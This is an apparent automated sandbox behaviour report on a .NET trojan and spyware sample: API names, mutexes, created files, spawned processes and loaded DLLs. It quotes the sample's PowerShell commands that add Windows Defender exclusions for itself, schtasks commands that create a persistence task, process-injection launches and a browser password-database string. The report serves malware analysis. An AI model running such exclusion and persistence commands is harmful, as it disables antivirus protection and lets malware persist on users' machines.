                Source: HrovwwypYVlFWB.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, n6eXSFw2UA5h51Qd8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, n6eXSFw2UA5h51Qd8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, n6eXSFw2UA5h51Qd8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, n6eXSFw2UA5h51Qd8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, hISkYvQ5NV6mByK8fF.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, hISkYvQ5NV6mByK8fF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, hISkYvQ5NV6mByK8fF.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, hISkYvQ5NV6mByK8fF.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, hISkYvQ5NV6mByK8fF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, hISkYvQ5NV6mByK8fF.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, hISkYvQ5NV6mByK8fF.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, hISkYvQ5NV6mByK8fF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, hISkYvQ5NV6mByK8fF.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, n6eXSFw2UA5h51Qd8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, n6eXSFw2UA5h51Qd8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/21@14/11
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeFile created: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5200:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeMutant created: \Sessions\1\BaseNamedObjects\AcbFYPhOID
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeFile created: C:\Users\user\AppData\Local\Temp\tmp476F.tmpJump to behavior
                Source: 0t7MXNEfCg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0t7MXNEfCg.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: EhStorAuthn.exe, 0000000F.00000002.3312040086.0000000003600000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000003.1286750548.00000000035DD000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3312040086.00000000035D2000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000003.1279380963.00000000035D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 0t7MXNEfCg.exeVirustotal: Detection: 75%
                Source: 0t7MXNEfCg.exeReversingLabs: Detection: 87%
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeFile read: C:\Users\user\Desktop\0t7MXNEfCg.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\0t7MXNEfCg.exe "C:\Users\user\Desktop\0t7MXNEfCg.exe"
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp69AD.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeProcess created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe"Jump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe"Jump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp69AD.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeProcess created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
